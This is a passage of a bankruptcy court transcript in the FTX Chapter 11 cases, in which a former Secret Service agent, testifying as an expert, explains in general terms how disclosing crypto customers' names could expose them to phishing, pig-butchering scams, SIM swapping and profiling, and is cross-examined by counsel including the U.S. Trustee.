 4   approach and hand Mr. Sheridan a copy of the declaration --
 5              THE COURT:  Yes.
 6              MR. SASSON:  -- and exhibits?
 7              THE WITNESS:  Thanks.
 8                        DIRECT EXAMINATION
 9   BY MR. SASSON:
10   Q     Good morning, Mr. Sheridan.
11   A     Good morning, sir.
12   Q     Mr. Sheridan, can you please describe briefly your
13   educational background?
14   A     My education, I have a Bachelor's Degree from the
15   University of Arizona in Criminal Justice, as well as a
16   Master's Degree from the University of Arizona in Public
17   Administration, with a criminal justice emphasis.
18   Q     And do you have any specialty certifications?
19   A     Yes, sir.  As it relates to this matter, I am chain
20   analysis reactor certified, which is the analytical tool for
21   blockchain analysis, developed by CHAINALYSIS.
22         I have expert certifications from the Blockchain
23   Council, which are cryptocurrency auditor, cryptocurrency
24   expert, and blockchain expert.
25         I have a certificate from Carnegie Mellon University
```

**A0550**

 1  for chief information security officer.

 2       I have a certificate from Columbia Business School of

 3  Executive Education, blockchain for business.

 4       I am a certified information security manager through

 5  the Information Systems Audit and Control Association.

 6       I also have two certificates from the Global

 7  Information Assurance Corporation in information security

 8  governance and leadership.

 9  Q    And I think you mentioned that these relate to this

10  matter.  So all of these -- all of these certificates

11  specifically relate to what sort of type of experience?

12  A    Digital assets, blockchain, cryptocurrency, information

13  security, and cyber security.

14  Q    All right.  And could you just please summarize your

15  employment history since you graduated?

16  A    Since I graduated from college, I spent a year as a

17  juvenile corrections officer, 4 years as a police officer, 24

18  years with the United States Secret Service, 1 years as the

19  Vice President of Regulatory Affairs for a private digital

20  asset infrastructure company, and the past 3 months with FTI

21  Consulting.

22  Q    And for everyone's benefit, what relation does the

23  Secret Service have to cyber currency -- to cryptocurrency or

24  cybercrime or just criminal investigations generally?

25  A    The Secret Service has statutory authorization to

**A0551**

1   conduct investigations into financial crimes of all types.

2        As a result of that legal authority, as well as being

3   one of two agencies listed in the -- with specific statutory

4   authority in the Computer Fraud and Abuse Act, us and the

5   FBI -- the Secret Service and the FBI, we are legally

6   empowered to investigate financial crimes, ranging from

7   traditional financial crimes to digital financial crimes.

8   Q    And at the Secret Service, did you work in that

9   capacity, in investigation of financial crimes?

10  A    Yes, sir.  Throughout my 24 career -- twenty-four-year

11  career, in a variety of capacities.

12  Q    And so do you have experience with investigating cyber-

13  based crimes?

14  A    Yes, sir.

15  Q    How long have you investigated cyber-based crimes?

16  A    During my 24 years with the Secret Service, I spent

17  times in an investigative role, in total it would be 7 years

18  as a non-supervisory agent and then another 7 years as a

19  supervisory agent.

20  Q    And as part of your investigation of cyber-based

21  crimes, do you have any experience investigating crimes that

22  relate to block -- the blockchain or cryptocurrency

23  generally?

24  A    Yes, sir.

25  Q    And how much experience do you have there?

1   A     Blockchain and digital assets would be approximately

2   four years.

3   Q     And have you ever testified before?

4   A     I have testified as an expert witness in front of the

5   United States Congress on three separate occasions, twice in

6   front of the House of Representatives and once in front of

7   the U.S. Senate.

8   Q     And what was the nature of that testimony?

9   A     Those were related to blockchain digital asset and

10  cryptocurrency investigations.

11  Q     Thank you.

12        And do you possess any security clearances?

13  A     I have a top secret SCI security clearance.

14  Q     And what institution granted you that clearance?

15  A     Through the United States Government, I believe it's

16  the Department of Justice.

17  Q     All right.  And I think -- I believe you had mentioned

18  this earlier.  But where are you currently employed?

19  A     With FTI Consulting.

20  Q     And what is your title at FTI?

21  A     I'm a Managing Director.

22  Q     And how long have you held that title?

23  A     For three months.

24  Q     And what are your day-to-day job responsibilities as a

25  managing director?

1  A     So I lead our investigations function within FTI.  And

2  in that capacity, I lead teams of blockchain and digital

3  asset investigators, forensic analysts, consultants who

4  engage in a variety of investigative capacities, everything

5  from theft, fraud, scam, market valuation, track and trace,

6  and -- and other functions related to digital assets.

7  Q     All right.  And in your capacity as advisor in FTI,

8  have you become familiar with the facts of this case?

9  A     Yes, sir.

10  Q     Okay.  So just moving on more generally.

11       Based on your experience investigating crimes and

12  cybercrimes, do bad actors typically target holders of

13  cryptocurrency?

14  A     Yes, sir.

15  Q     Why is that?

16  A     I think, largely, it's due to the nature of the asset

17  itself.  Cryptocurrency is extremely valuable.  It is global

18  and near instantaneous in its transfer.  It is pseudo-

19  anonymous.  And the transactions are irreversible.  So, as a

20  result, it provides opportunity for criminal actors as both

21  means and method to execute criminal schemes.

22  Q     And do you have any direct experience with bad actors

23  targeting holders of cryptocurrency?

24  A     Yes, sir.

25  Q     And without going through everything that was said in

1    your declaration, can you just briefly summarize some of that

2    experience?

3    A     Yes.  So, in both my investigative role with the United

4    States Secret Service, in my private sector capacity in

5    regulatory affairs, specifically our customer base, as well

6    as in my current role with FTI in investigative functions, I

7    have led and been part of investigations that relate to the

8    types of schemes I've outlined in my declaration:

9         Business email compromises that target cryptocurrency

10   holders by means of email communications purporting to be a

11   legitimate business communication;

12        Pig butchering, where specific individuals are targeted

13   based on their name and fooled into investing cryptocurrency

14   in incremental ways, in order to increase the amount of funds

15   that will be taken from that individual;

16        Romance scams where individuals are targeted and lured

17   into sending cryptocurrency to criminal actors;

18        Phishing attempts, where, you know, fraudulent emails,

19   texts, or other communications are used to deliver malware or

20   malicious payloads to user networks for the purpose of

21   unauthorized access and account or cryptocurrency credential

22   harvesting;

23        A variety of different criminal schemes that -- that

24   I've been involved in.

25   Q     All right.  Just to focus on one, pig butchering, for

1   example.  Would it be easier or harder to target someone if

2   you were -- wanted to facilitate pig butchering if they were

3   already a holder of cryptocurrency?

4   A     It's much easier if they are already a holder.  By

5   nature of that scheme, if you're involved with cryptocurrency

6   as the method of profit, if someone doesn't have a

7   cryptocurrency account or is unfamiliar with the operations

8   of cryptocurrency transactions, you have to instruct them on

9   that, guide them through setting up the account, explain the

10  basics of the technology to them and so forth.

11        Whereas, if that individual is already active in the

12  space, if -- that barrier is removed and you can get right to

13  the true elements of the -- the crime, which are getting them

14  to deposit assets into fraudulent accounts.

15  Q     Got it.

16        And are crimes involving blockchain and/or

17  cryptocurrency different than those involving traditional

18  fiat currency?

19  A     Yes, they are different.

20  Q     And how so?

21  A     Well, one, as the reasons I listed in one of your

22  previous questions, the nature of the technology itself is --

23  is the primary reason.

24        But there is also an element of distance between the

25  criminal actors and the targets in these cases.  Many of the

**A0556**

1 criminal actors, the majority of the criminal actors we

2 encounter are, in this case -- in these cases, organized

3 groups, highly competent, often foreign actors that take

4 advantage of their targets who may not be as sophisticated in

5 the technology and use that to their advantage to prevent

6 detection or identification or judicial consequence or -- or

7 retrieval of funds.

8 Q    And certain objectors have argued that cryptocurrency

9 users are, in fact, more sophisticated and so are less likely

10 to fall prey to cybercrimes.  Do you agree with that

11 statement?

12 A    I do not agree with that characterization.  I think, by

13 the very nature of the data shown and the amount, both in

14 valuation and volume of cryptocurrency fraud scams and crimes

15 that continue to occur, it demonstrates a lack of

16 sophistication a high -- high volume of users.

17      I also think that there is a mantra in digital asset

18 investing, cryptocurrency investing, of not your keys, not

19 your crypto, which is meant to say that, if you don't possess

20 your private keys singularly in some type of cold storage

21 or -- or non-online type of -- of mechanisms or storage

22 device, then you don't truly have access to your crypto.

23      And what we see most consistently is that the crimes

24 that are occurring are people who surrender their keys to an

25 exchange or other platform or through a lot of the schemes

1   that I've identified.  They surrender their keys by -- by

2   being fooled into doing so or by some type of investment

3   approach by them because they're focused on the return and,

4   you know, promises of -- of quick profit from -- from their

5   investments, which is not truly what the technology and the

6   assets are -- how they're intended to function, in terms of a

7   security protocol and a secure mechanism of possessing

8   private keys.

9   Q    And in your opinion, FTX users specifically, would they

10  be an easier or a harder target for cyber criminals?

11  A    My assessment is they would be an easier target.  This

12  population of users was specifically marketed to as an easier

13  and less technical customer, which it appears attracted a

14  very high volume of those individuals, who, in fact,

15  surrender their keys, as I described earlier, to the exchange

16  and did not truly have the full security control of their

17  accounts.

18       I think, by nature of their focus solely on the return

19  on the investment, as opposed to the security of the

20  investment, these individuals do not demonstrate a high level

21  of technical awareness or security focus related to their

22  assets.

23  Q    And when you see "these individuals," are you talking

24  about all the individuals on FTX?

25  A    I wouldn't be able to speak to all individuals, but

**A0558**

1  as -- the majority of the population certainly appears to

2  have willfully surrendered their keys and their access to

3  their accounts in the investment approach.

4  Q     Okay.  Switching gears for a second.

5        In your experience, would simply having an individual's

6  name, but not their home address or email address, be enough

7  for a bad actor to identify them and perpetuate a cybercrime?

8  A     Yes, sir.  I think that is the entry into that ability.

9  Q     Why is that?

10 A     I don't think, in today's day and age, people exist

11 solely as names.  Names are connected to a wealth of

12 information that is available in publicly available places

13 that is provided voluntarily or just by recordkeeping

14 mechanisms of these individuals.

15       And I also think criminal actors in the cyber space

16 related to digital asset crimes are very well versed in non-

17 surface web methodologies that provide a host of information

18 about individuals.

19       And what I mean by that is, you know, the surface web

20 is 4 percent of what you and I see in our daily lives of

21 Google and other publicly available search engines.  The

22 other 96 percent is deep web or dark web marketplaces that

23 traffic in illicit -- you know, illicitly obtained

24 information about individuals that can be, as a fee-for-

25 service, used to link individual names to actual people,

1    provided -- using information that is already available on --

2    in these dark web marketplaces.

3    Q     Let's say, for example, you had my name, but nothing

4    else.  How would you go about correlating other personally

5    identifiable information?

6    A     So I would do it in those two broad lines of effort:

7          In the publicly available public records that are --

8    list your name, use that corroborate and correlate to any

9    online profile or persona that you have created.  These are

10   the more voluntary ways that you've done, through your social

11   media profile, everything from Facebook to LinkedIn to

12   Instagram.

13         I would then delve into the dark web options that have

14   these fee-for-service trafficking in personal information and

15   start to build my portfolio of you with those methods and

16   start to identify you as an individual beyond just your name.

17   Q     And would that be difficult to do?

18   A     Not in my opinion, sir.

19   Q     Why not?

20   A     Because of the volume of information that is out there

21   in publicly available records, in the information that is

22   voluntarily provided by most everyday people, as well as the

23   volume of information that has been released on the dark web

24   through the -- the number of large volume hacks that have

25   occurred, everything from the Target to LinkedIn to Yahoo to

1  Marriott.  There is a very high volume of personally

2  identifiable information for purchase on the dark web that

3  can be used to connect individuals from their public online

4  digital fingerprint.

5  Q    Now, to add to that hypothetical, let's say you also

6  knew that I was a cryptocurrency user.  Would that make it

7  easier or harder to find out other personally identifiable

8  information about me?

9  A    Yeah.  Any piece of information helps to make that

10  picture clearer, especially financial information, especially

11  cryptocurrency information because it is publicly available

12  on the blockchain and you can research transactions using

13  publicly available and free tracking methods.

14      So, if I know that you're involved in cryptocurrency, I

15  can start to research you through different exchanges,

16  different communications you've put out, different purchases,

17  understand what your spending profiles are, understand what

18  type of tokens you utilize, see what you're posting online

19  about your activities related to cryptocurrency, and then

20  start to actually search on the blockchain for specific

21  transactions that match up with time lines, amounts,

22  transactions that you may be communicating.

23  Q    And just to add to the hypothetical, let's say you knew

24  that, not only that I was a cryptocurrency user, but I was an

25  FTX user and the coins I had held in my account as of the

1  petition date.  Would that make it easier or harder?

2  A     Yeah, any piece of information makes it easier.  So

3  knowing what exchanges you're involved in, the types of

4  coins, the dates you're transacting, all of those add a level

5  of specificity that will help to verify you are, in fact, the

6  person that I am researching in these other venues.

7  Q     All right.  Are you generally familiar with the Celsius

8  Chapter 11 cases?

9  A     Yes, sir.

10  Q     And based on what you know about the case, can you

11  describe what happened to the Celsius retail customers when

12  the individual names were disclosed?

13  A     Yes, sir.  Those names were compiled and placed into a

14  interactive, searchable Excel spreadsheet that was put online

15  through Celsiusnetworth.com.  Once that spreadsheet got --

16  was -- was put online, anyone was able to access it, identify

17  the individuals, identify the amounts associated with them,

18  and conduct research from that spreadsheet.

19  Q     And did anything else occur in Celsius with respect to

20  personally identifiable information?

21  A     I know there were multiple reported incidents of

22  phishing, business email compromise, other types of criminal

23  schemes that targeted the individuals listed in -- in that

24  spreadsheet or in those names that were released.

25  Q     And based on your experience, do you believe that

**A0562**

1  similar attempts would occur here if the individual customer

2  names were publicly disclosed?

3  A     Yes, sir.

4  Q     And do you perceive a higher or lower risk of attacks

5  in this case than the Celsius case?

6  A     I think there's a much higher risk related to this case

7  because of the prominence of the case, the notoriety of the

8  case, and also where the industry is at this particular time

9  in the overall market.

10       Backed by -- you know, I think one that's very

11  different about the cryptocurrency environment is the crypto

12  Twitter nature of ow information is communicated in realtime,

13  instantaneously, and with a focus and intensity that doesn't

14  exist in other markets.

15  Q     All right.  Putting aside the cryptocurrency bankruptcy

16  cases, just generally, between a cryptocurrency bankruptcy

17  case and a regular Chapter 11 case or even this case and a

18  regular Chapter 11 case, do you perceive a higher or lower

19  risk to cyber schemes and attacks on personally identifiable

20  information?

21  A     Again, much higher in this case by nature of -- of the

22  crypto Twitter universe, as I explained it.  There -- there

23  is not a bankruptcy twitter club or -- or population, if you

24  will.  There is not a Best Buy Twitter handle.  There --

25  there is crypto Twitter, and that feeds information and

1  really accelerates the way that different approaches and

2  perspectives are shared.

3      And I think there's also a much higher visibility in

4  this case than other bankruptcy proceedings.

5  Q    All right.  And last couple of questions.

6      In your experience, will disclosure of customer names

7  in these bankruptcy cases subject customers to significant

8  harm?

9  A    Yes, sir.

10 Q    And just last question.

11      Are -- according to some objectors, crypto users are

12 just like anyone else and, to quote:

13          "Sometimes scammers target them and that is just a

14 fact of life."

15      Do you agree that subjecting yourself to constant scams

16 and potential harm is just something that everyone needs to

17 live with?

18 A    No, not at all, sir.  And I think that -- that type of

19 casual and dismissive approach to this being just something

20 that happens is -- is not reflective of the true harm it

21 causes.

22      And particularly in this case, for the reasons

23 outlined, cryptocurrency itself, the high profile nature of

24 FTX, the crypto Twitter highlighting and -- and exacerbation

25 of the events here, as well as the way the industry does not

1   have similar protections, backstops, centralized regulatory

2   structures or a really level of protection that -- that

3   traditional finance or -- or other schemes may have makes

4   this a much more significant risk of harm to those involved.

5   Q     Thank you, Mr. Sheridan.

6          MR. SASSON:  Your Honor, no further questions at

7   this time.

8          THE COURT:  Okay.  Thank you.

9          Does anyone else wish to ask questions in support?

10         MR. WENDER:  Yes, Your Honor.

11         THE COURT:  Go ahead.

12         MR. WENDER:  Good morning, Your Honor.  For the

13  record, David Wender with Eversheds Sutherland on behalf of

14  the Ad Hoc Committee of Non U.S. Customers.

15                       CROSS-EXAMINATION

16  BY MR. WENDER:

17  Q     Good morning, Mr. Sheridan.

18  A     Good morning, sir.

19  Q     Just -- hopefully just a few questions.

20         The good portion of your declaration and testimony

21  today focused on the potential harm to individuals.  That

22  same harm is also subjected to on corporations and business

23  entities, correct?

24  A     Possibly, sir.  Yes, sir.

25  Q     And in fact, in your declaration, you talk about that

**A0565**

1   you have experience on ways that businesses are also impacted

2   by this.  Is that correct?

3   A     Yes, sir.

4   Q     In fact, Exhibit P to your declaration -- and if you

5   need to look at it, although I'm just going to -- it really

6   Paragraph 23 -- talks about the biggest data breaches of the

7   21st Century.  Those were all companies, right?

8   A     That's correct, sir.

9   Q     And Exhibit Q, where it talked about the biggest crypto

10  heists, those are also companies, not individuals, right?

11  A     The crypto heist one I don't have off memory.  Can you

12  refer to --

13  Q     It's Exhibit Q.  And I -- and it -- and it's not --

14  I -- just looking at it quickly, and I can even highlight it,

15  as well.  It said 17 biggest crypto heists of all time, and

16  it's Exhibit Q to your declaration.  And it lists MT Gox or

17  Gox -- I never pronounce that correctly.  That's an entity,

18  right?

19  A     (No verbal response.)

20  Q     And if I went through all of them, I don't see an

21  individual's name there.

22            MR. SASSON:  It's Tab 18.

23            MR. WENDER:  Huh?

24            MR. SASSON:  Tab 18.

25  BY MR. WENDER:

1  Q     Tab 18.  Sorry.

2  A     Okay.

3  Q     I apologize.  I had it tabbed by letter.

4  A     The -- the only distinction I would make, sir, is that

5  I think, while the data breaches are companies, the crypto

6  heists are of wallets within those companies that are

7  associated with individuals.  And that may be just parse of

8  words, but --

9  Q     Yeah.

10  A     -- they --

11  Q     But --

12  A     -- they were held in centralized locations of

13  exchanges, so --

14  Q     Yeah.  But those affected entities, but then also, in

15  turn, potentially their customers, there are individuals and

16  other entities in subparts, right?

17  A     Yes, sir.

18  Q     Because, when hackers attack a business entity, they go

19  after the business information at times, correct?

20  A     Yes, sir.

21  Q     And then also, for example, customer lists of their own

22  people, employees, and the like.  So individual information

23  is also, at times, attacked by hackers when they go after

24  corporate entities.

25  A     Yes, sir.

1  Q      Fair?  Great.

2        And then -- and you talked about here, where it's the

3  involvement of individuals and their names were such that

4  people could identify them and be able to target them more

5  specifically.

6        Now, if a customer had to list both their name, their

7  address, and their holdings, that would make it an easier

8  target, right?

9  A      Significantly, yes.

10  Q      Okay.  Thank you for that.

11        Now -- and so -- and you talked about business email

12  compromise earlier in part of your declaration.  So, in a

13  business email compromise, are they more effective if someone

14  first obtains access to a corporate network?  Does that

15  question make sense?

16  A      It makes sense.  I would say -- I wouldn't classify the

17  business email compromise as more effective.  I would

18  classify account spoofing as more effective.  It's -- it's a

19  different scheme.

20        But if the point of your question is the business

21  nature, if you obtain access to, as I've seen in cases I've

22  investigated, the domain name server of the business, you can

23  then spoof that domain and redirect potential users of that

24  domain to fraudulent locations.

25  Q      First, correct for -- thank you for correcting my

1    question and making it more expert.  I'm not an expert, but

2    thank you for that.

3          But then it is easier in that situation to, once you

4    spoof -- to use your term, hopefully correctly -- then you

5    can get access to individual information and their assets in

6    furtherance of their hacking or schemes.  Is that correct?

7    That happens at times?

8    A    Yes, sir.

9    Q    Okay.  Thank you.

10             MR. WENDER:  Nothing further.

11             THE WITNESS:  Yes, sir.

12             THE COURT:  Anyone else in support?

13         (No verbal response)

14             THE COURT:  Okay.  Cross.

15         (Pause)

16             MS. SARKESSIAN:  Good morning, Your Honor.  This

17   is water, not coffee.  I just --

18             THE COURT:  That's fine.

19             MS. SARKESSIAN:  I don't want you to be worried

20   I'm like spilling things.

21             THE COURT:  Coffee and water both spill, but

22   that's okay.

23         (Laughter)

24             MS. SARKESSIAN:  Well, all right.  It does less

25   harm, I suppose, if it's just water.

1          Okay.  For the record again, Juliet Sarkessian on

2   behalf of the U.S. Trustee.

3          Your Honor, before I commence my cross, I think --

4   and maybe I missed this.  But it's my understanding that Mr.

5   Sheridan is being offered as an expert witness.  I'm just not

6   sure that that was distinctly, expressly stated, and I just

7   want the record to be clear on that if that is the case.

8        (Participants confer)

9          MR. SASSON:  Your Honor, it doesn't need to be

10  stated, but yes, he is.

11         THE COURT:  Okay.  Well, normal procedure would

12  be, if you had an expert, you qualify them, I say that

13  they're an expert witness, and then you get to elicit the

14  testimony from them.  You didn't follow that, but that's

15  fine.

16         I don't have any issues.  I think his

17  qualifications are absolutely clear that he's an expert in

18  this field, so I have no problem with recognizing him as an

19  expert in the field.

20         MR. SASSON:  Thank you, Your Honor.

21         MS. SARKESSIAN:  Yes, Your Honor.  I'm not

22  objecting to him being an expert.  I just wanted the record

23  to be clear that that was how he was being offered.

24         THE COURT:  Yeah.

25         MS. SARKESSIAN:  Thank you.

```
 1                          CROSS-EXAMINATION
 2   BY MS. SARKESSIAN:
 3   Q     Okay.  Sir, I have -- let me start -- I have a few --
 4   first of all, good morning.
 5   A     Good morning, ma'am.
 6   Q     I have a few questions.  I'm going to start with your
 7   declaration.  And really, this is for -- I'm asking questions
 8   so I can better understand, have better clarity.
 9         The first thing -- and I'm not sure how significant
10   this is -- but you talk about, in Paragraph 4, you say at the
11   last sentence:
12              "I possess a Top Secret/Sensitive Compartmented
13   Information security clearance."
14         And my question is:  Is that -- you're no longer
15   working for the Government, correct?
16   A     I'm sorry, ma'am?
17   Q     You're no longer an employee of the Government.  Is
18   that correct?
19   A     That's correct.
20   Q     So do you still have the Top Secret/Sensitive
21   Compartmented Information security clearance?
22   A     Yes, ma'am.
23   Q     And how long will that last for?
24   A     Another three and a half years.  It's -- you go through
25   five-year periodic updates.
```

1  Q      Uh-huh.  Which I am familiar with, I --

2  A      Yeah.

3  Q      -- since I'm a government employee.

4  A      Yes, ma'am.

5  Q      Okay.

6  A      Mine was shortly before I retired, and so just based on

7  the time line.

8  Q      Okay.  Thank you.

9         (Pause)

10 Q      Okay.  With respect to -- if you could maybe turn to

11 Paragraph 10 of your declaration, please.

12 A      Yes, ma'am.

13 Q      Okay.  So the first sentence says:

14         "[The] odds of success for identify and asset

15 theft crimes are increased even further if they are committed

16 against vulnerable persons, such as the debtors' customers in

17 these Chapter 11 cases" --

18         Do you see that?

19 A      Yes, ma'am..

20 Q      So my question is:  How about individuals who are not

21 customers of the debtors, but are other types of creditors in

22 these cases?  Would knowing that such an individual was a

23 creditor of FTX, not a customer, but it's some other type of

24 creditor, would that make it more likely that they could be a

25 victim of identity theft than any other person?

**A0572**

1   A       If I knew someone was a creditor in some other

2   proceeding, I would need to know the full circumstances.

3           The line of thought behind that statement in

4   Paragraph 10 is based on my knowledge of FTX, the amounts

5   involved, the steep and contradictory way in which that

6   exchange went from the most prominently secure and qualified

7   custodian to a -- one that was accused of, you know,

8   committing acts of fraud with customer funds.

9           I think, when an individual invests in something that

10  they are very are very confident in, that turns out to be the

11  exact opposite of that set of circumstances and there is high

12  valuation involved, that creates an opportunity and a

13  vulnerability that could be exploited.

14  Q       All right.

15  A       So I would need to know the full circumstances of the

16  other situations you're asking me about.

17  Q       Right.  Because what you just testified to would apply

18  just to actual customers of FTX, correct?

19  A       The way I have it described, yes.

20          (Pause)

21  Q       Okay.  Would you please turn to Paragraph 15 of your

22  declaration, please, which deals with the term "pig

23  butchering"?

24  A       Yes, ma'am.

25  Q       So -- and this question may relate to some other

1   provisions in your declaration, as well.

2       But do you have an under -- I assume you know what a

3   "cold wallet" is, correct?

4   A    Yes, ma'am..

5   Q    Okay.  Could you explain what that is?

6   A    It is a wallet that is not connected to online

7   functionality.  So, as I referenced earlier, you can store

8   your wallet information and your private key, public key,

9   seed phrase, and wallet addresses in a medium, usually a USB-

10  type device, that is not connected to online internet.

11  Q    Do you have an understanding of whether, in these

12  cases, the debtors' current management has transferred all

13  customer accounts into cold wallets?  I may not be saying it

14  exactly correctly.  But do you have an understanding about

15  that?

16  A    I do not know what storage methods are being used by

17  FTX.  Is that what you're asking me?

18  Q    Yes.

19  A    I do not know how they are storing customer funds.

20  Q    If customer funds are being -- in any situation, are

21  being stored in a cold wallet, does that make it more

22  difficult for a bad actor to access that account, even if

23  they have the person's name?

24  A    To access the funds in the wallet?

25  Q    Yeah.  Their funds --

1   A     Cold --

2   Q     -- in the account.

3   A     Yes, ma'am.  Cold wallet storage is a much more secure

4   way to store digital assets.

5   Q     Okay.  So, if a bad actor, even if they knew the name

6   of a customer, they would not be able to break into a cold

7   wallet to steal money out of the customer account.  Is that

8   correct?

9   A     I wouldn't characterize it that way because many of the

10  cryptocurrency frauds involve manipulation of individuals.

11  And once you know that individual and can engage with them,

12  you can manipulate them into accessing their cold wallet,

13  putting it in a warm or hot state online, and then harvest

14  their credentials, conduct, you know, these type of schemes

15  by having them bring their cold wallet into a hot or warm

16  state.

17  Q     Okay.  Are you talking -- when you're talking about

18  individuals that the wrongdoer is contacting, do you mean

19  somebody who's an actual customer, that they're getting that

20  customer -- they're manipulating the customer to get access

21  to the cold wallet?

22  A     Yes, in a general -- in a general sense.

23        If the customer doesn't have access and can't get their

24  cold wallet --

25  Q     That manipulation would not work, correct?

**A0575**

1  A     Yes.  If you -- if the customer can't get their funds,

2  you can't manipulate them into using their funds -- or

3  submitting their funds for criminal purposes.  That's

4  correct.

5  Q     Thank you.

6        Now you had -- and I'm jumping now for a minute to your

7  live testimony today.

8        You testified -- I think you testified that FTX

9  customers, prior to the bankruptcy, had turned over keys to

10 their account to wrongdoers.  Did I understand that

11 correctly?

12 A     No, ma'am.

13 Q     Okay.  All right.  So you don't have any knowledge as

14 to, prior to the bankruptcy, whether any FTX customers were

15 the victim of some, you know, wrongdoing, where they were

16 manipulated into turning over their keys or any other way to

17 access their accounts?

18 A     I do not have information about specific FTX customers.

19       (Pause)

20 Q     Okay.  And if we could please turn to Paragraph 20 of

21 your declaration, please.  And it concerns SIM swapping.

22 A     Yes, ma'am.

23 Q     And then, if you could go down to -- well, I won't

24 focus you on any particular sentence.

25       But this -- SIM swapping has to do with cell phones,

1  correct?

2  A    Yes, ma'am.

3  Q    Okay.

4  A    "SIM swapping" it's --

5  Q    SIM --

6  A    -- referred --

7  Q    -- swapping.

8  A    Yes, ma'am.

9  Q    Okay.  Does this method work if the individual who has

10 an account, again, does not have access to it because it's in

11 a cold wallet?

12 A    So I think the distinction I would make is that the

13 specific funds in that cold wallet, the answer would be the

14 same as your previous question, they would not be -- if the

15 target does not have access to those funds because they're in

16 a cold wallet that the target cannot obtain.  However, you

17 know, there are other criminal schemes that could be executed

18 beyond those specific funds if that individual had assets in

19 other wallets, other hot wallets, or other locations.

20 Q    Paragraph 22, if you could please turn to paragraph 22

21 of your declaration.

22 A    Yes, ma'am.

23 Q    So the first sentence says, "Beyond the potential for

24 physical harm, emotional distress, cyber threats, kidnaping,

25 stalking, and bullying that could occur, malefactors could

1    likely determine the physical address of the debtors'

2    customer as a result of disclosure of individual customer

3    names."  Do you see that?

4    A     Yes, ma'am.

5    Q     My question is, with respect to the physical address,

6    is it any easier to find a person's physical address knowing

7    that they happen to a customer of FTX, as opposed to getting

8    the physical address of any other person?

9    A     I think that whatever the source of information is,

10   whether it's a customer of FTX or others, the description

11   related to this is the harm that would come because they're a

12   customer of FTX and this -- for ease of communicating the

13   idea, this crypto-Twitter idea about very public, vocal,

14   elevated, and heightened type of instant communication

15   surrounding cryptocurrency holders, cryptocurrency events,

16   especially events of this nature and magnitude.

17   Q     Okay.  So, just to be clear, the fact that somebody was

18   a customer of FTX, coupled with just their name, does not

19   make it easier for a wrongdoer to find their physical address

20   as opposed to any other individual who's not a customer of

21   FTX?

22   A     I think, if you have the fact that they're a member

23   of -- or, excuse me, a customer of FTX, that's a piece of

24   information.  If I simply have your name and no other

25   information versus having your name and you're a customer of

**A0578**

1  FTX, coupled with the amount of your account transaction

2  volume with the type of token that you're engaging with in

3  FTX or utilizing as a customer, those pieces of -- every

4  piece of information is an asset in my investigation to

5  identify you.

6         So a customer of FTX, yes, that's a piece of

7  information that I now can use to research chat forums,

8  transactions on the block chain, other types of investigative

9  material related specifically to cryptocurrency that may be

10  of value to help me identify you, as opposed to just name and

11  no cryptocurrency engagement whatsoever.

12  Q    Right, I understand what you're saying, but I don't

13  think you're actually -- I don't know that you've actually

14  answered my question.  My question is very simple.

15  A    Okay.

16  Q    For somebody who's a wrongdoer, is it easier to find an

17  individual's physical address knowing that they're an FTX

18  customer than some other individual who's not an FTX

19  customer?

20  A    Yes, ma'am.

21  Q    It is easier to find their physical address just

22  knowing that they're an FTX customer?

23  A    Yes, ma'am.

24  Q    Explain to me how that is?  Not other information, but

25  just their address, their physical address.

1   A      And I'll try and explain a different way.  I apologize

2   if in my previous answer I didn't.  Knowing you an FTX -- so

3   I would not stop there with the name Jeremy Sheridan and FTX

4   customer.  If my investigation stopped there, I would submit

5   that your question is, yes, that wouldn't help me at all, but

6   knowing that you're an FTX customer, I know you're going to

7   be involved in cryptocurrency, I know you're going to have

8   involvement in other transactions related to cryptocurrency.

9   You may be involved in cryptocurrency chat forums, you may be

10  involved in other exchanges, you may be involved in crypto

11  Twitter, I will use that as an investigative lead to start to

12  build that profile of you because I know you're a customer of

13  FTX and you have engaged in cryptocurrency transactions, as

14  opposed to just the name Jeremy Sheridan, it gives me a piece

15  of investigative information that I will build upon.  That's

16  the way criminals or as an investigator I identify you is by

17  taking those pieces of information and corroborating them to

18  other pieces of information to build you as a person.

19  Q      But isn't one of the benefits of cryptocurrency is

20  supposed to be that it's anonymous and that you're not

21  revealing your address or even many times your email address

22  in doing these crypto transactions, isn't that correct?

23  A      I think anonymity in cryptocurrency is a misconception.

24  Q      Okay.

25  A      It is pseudo-anonymous, but it is also publicly-

1  available, accessed, digital, cryptographic transactions that

2  occur in public, open space that anyone can access at any

3  time.  So it is in many ways contrary to anonymity.

4  Q    I understand.  Now, I want to go to your -- the live

5  testimony this morning in response to Counsel for the Ad Hoc

6  Committee and he asked you some questions about harm to

7  corporations who are customers, but he also asked you -- if I

8  understand correctly, he was tying together a situation in

9  which a corporation is the FTX customer -- not the employees

10 of the corporation, but the corporation is an FTX customer,

11 and that that can result in some harm to the employees of

12 that company even if they are not themselves FTX customers.

13 Is that correct?

14 A    I answered those questions based on customers of that

15 company, not employees of that company.  Is that your

16 question?

17 Q    Oh, customers of -- customers of a company that's

18 customers of FTX?

19 A    If a company is a customer of FTX --

20 Q    Then who is it that's going to be harmed other than the

21 customer of FTX?

22 A    The downstream customers of that company.

23 Q    Okay.  And how is that?

24 A    A company does not exist in a vacuum, in my opinion; it

25 is comprised of customers who engage in the business

1   operations of that company.  So if a company is involved in

2   FTX and through -- I would have to know the circumstances of

3   their business operations, dealings, and connections, but if

4   I could identify individuals who are customers of that

5   company, I could then in similar ways to the individual

6   customer names start to build a profile of those customers

7   and execute similar criminal schemes of the customers of that

8   parent company.

9   Q     So let's say you have two companies.  One is company A,

10  they're a customer of FTX, and you have company B, who's not

11  a customer of FTX.  Both A and B have their own customers.

12  A     Yes, ma'am.

13  Q     Knowing that company A is a customer of FTX, does that

14  make it any easier to figure out who company A's customers

15  are as opposed to company B's customers?

16  A     My answer would be similar to your previous question

17  about individuals, it's another piece of investigative

18  information that possesses publicly-available block chain

19  information about financial transactions that I could

20  potentially use to identify individuals who are engaging in

21  those business activities.

22  Q     When a company is engaging in transactions -- not

23  currently, but prior to bankruptcy was engaging in

24  transactions on the FTX format with cryptocurrency, how is

25  that providing any information about their customers?

1    A     I would have to know the circumstances of it.  In a

2    vacuum, if it's just the company name, it would take

3    additional investigative steps, but similar ways as I've

4    described before, if it's a company that is investing in

5    crypto assets that are being placed on FTX, and then I can

6    investigate that company and identify through open source

7    information or dark web information vulnerabilities in the

8    company, individuals posting about the company, individuals

9    communicating about their crypto transactions with the

10   company, there are possibilities and ways to identify

11   individuals who are engaged in those activities.  It's

12   another layer of distance from an individual.  And speaking

13   without true specifics about all of the details, it's hard to

14   be more concrete, but it is possible to build that type of

